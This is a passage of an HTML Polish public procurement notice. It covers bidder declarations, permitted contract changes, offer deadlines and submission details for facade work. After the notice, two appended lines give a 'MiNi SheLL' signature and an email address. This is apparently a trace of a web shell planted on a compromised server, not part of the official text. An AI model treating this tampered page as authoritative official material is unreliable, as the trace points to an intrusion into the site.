przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do<br/> wykluczenia, zgodnie ze wzorem treści przedstawionym w załączniku nr 4 do SIWZ. <br/>2. W przypadku, gdy o zamówienie ubiegają się wykonawcy występujący wspólnie, <br/> ww. oświadczenia składa każdy z wykonawców we własnym imieniu. Oświadczenie<br/> potwierdza spełnienie warunków udziału w postępowaniu w zakresie, w którym każdy <br/> z wykonawców wykazuje spełnienie tych warunków. Oświadczenie potwierdza również<br/> brak podstaw do wykluczenia.<br/>3. W przypadku gdy Wykonawca powołuje się na zasoby innych podmiotów, w celu <br/> wykazania spełnienia warunków udziału w postępowaniu w zakresie, w którym <br/> Wykonawca powołuje się na ich zasoby, przedstawia zobowiązanie tych podmiotów do <br/> oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. <br/> Zamawiający nie żąda, aby Wykonawca, który zamierza powierzyć wykonanie części <br/> zamówienia podwykonawcom, składał w stosunku do nich oświadczenie, że ww.podmioty <br/> nie podlegają wykluczeniu z postępowania.<br/>4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza w terminie 3 dni od <br/> dnia zamieszczenia na stronie internetowej informacji o której mowa w art. 253 ust. 2 <br/> ustawy p.z.p., przekaże Zamawiającemu oświadczenie o przynależności lub braku <br/> przynależności do tej samej grupy kapitałowej , o której mowa w art.85 ust. 1 <br/> ustawy p.z.p. (załącznik Nr 5). Wraz ze złożeniem oświadczenia<br/> Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą<br/> do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (art. 85 ust 2 ustawy<br/> pzp). <br/>5. Zamawiający przekaże wykonawcom oraz zamieści na platformie zakupowej wzór<br/> stosownego oświadczenia. <br/>6. W sytuacji gdy Wykonawcy wspólnie ubiegają się o zamówienie ww. oświadczenie składa<br/> każdy z Wykonawców we własnym imieniu. W przypadku gdy ofertę złoży jeden<br/> Wykonawca, - będzie on obligatoryjnie zwolniony z obowiązku złożenia przedmiotowego<br/> oświadczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z treścią art. 455 ustawy prawo zamówień publicznych dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiana dotyczy zmiany zakresu prac wynikających z toku realizacji przedmiotu zamówienia bez wprowadzania istotnych zmian w zatwierdzonej ofercie. Warunkiem dokonania takiej zmiany jest zapewnienie płynnej realizacji całości zamówienia. Ponadto zmiana Wykonawcy ekonomicznie nie byłaby uzasadniona i powodowałaby niedogodność lub zwiększenie kosztów dla Zamawiającego. Wartość zmiany nie może przekroczyć 10 % wartości zamówienia określonej w formularzu ofertowym Wykonawcy. Informacja o konieczności dokonania zmian potwierdzona być musi w protokole, zatwierdzonym pisemnie przez Zamawiającego. <br/>3.2. W związku z zaistnieniem okoliczności wymienionych w pkt. 3.1. określona <br/>w niniejszej umowie cena, może zostać zmniejszona lub podwyższona. W przypadku podwyższenia ceny umowy jej wysokość każdorazowo powinna być ustalona <br/>z Zamawiającym jednak nie może przekraczać 10 % wartości pierwotnej umowy.<br/>3.3. Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy) pod rygorem ich nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.lubelskie.straz.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Całość prac, w tym kolorystyka poszczególnych elementów elewacji, poprzedzona zostanie pełną wizualizacją zamierzenia (minimum 3 ujęcia) wykonaną przez Wykonawcę i przedstawioną do akceptacji przez Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com